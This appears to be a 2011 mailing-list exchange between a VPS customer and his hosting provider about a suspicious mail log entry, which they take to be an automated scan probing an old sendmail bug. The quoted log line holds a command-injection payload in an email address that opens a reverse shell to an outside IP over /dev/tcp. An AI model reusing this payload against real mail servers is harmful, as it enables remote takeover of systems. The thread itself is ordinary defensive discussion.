Hmm. Yes, I remembered I had a hit a while ago, but didn't look it up.
Looks like the same thing, different IP used ... just as well I'm
paranoid.
I'll post something if I think it is "interesting", or I need advice.
But it's amazing how much crap is attempted every day (especially
Apache).
Thanks.
On 11 February 2011 13:16, Andy Smith <andy(a)bitfolk.com> wrote:
Hi Alastair,
On Fri, Feb 11, 2011 at 09:29:49AM +0000, Alastair Sherringham wrote:
warning: 36FE51381A3: address with illegal
extension: root+:|exec
/bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0
But it was delivered. I hope nothing bad has happened. I am running
AIDE as we speak and digging around).
I was going to say, "I've seen this before, on this list even, and
it's trying to exploit a (fixed) bug in sendmail". But when I went
to look all I found was:
http://lists.bitfolk.com/lurker/message/20100318.074703.17e85b31.en.html
Which is also from you. :)
I don't think it's just you being targeted of course. I think it's a
general scan.
Cheers,
Andy
--
http://bitfolk.com/ -- No-nonsense VPS hosting
_______________________________________________
users mailing list
users(a)lists.bitfolk.com
https://lists.bitfolk.com/mailman/listinfo/users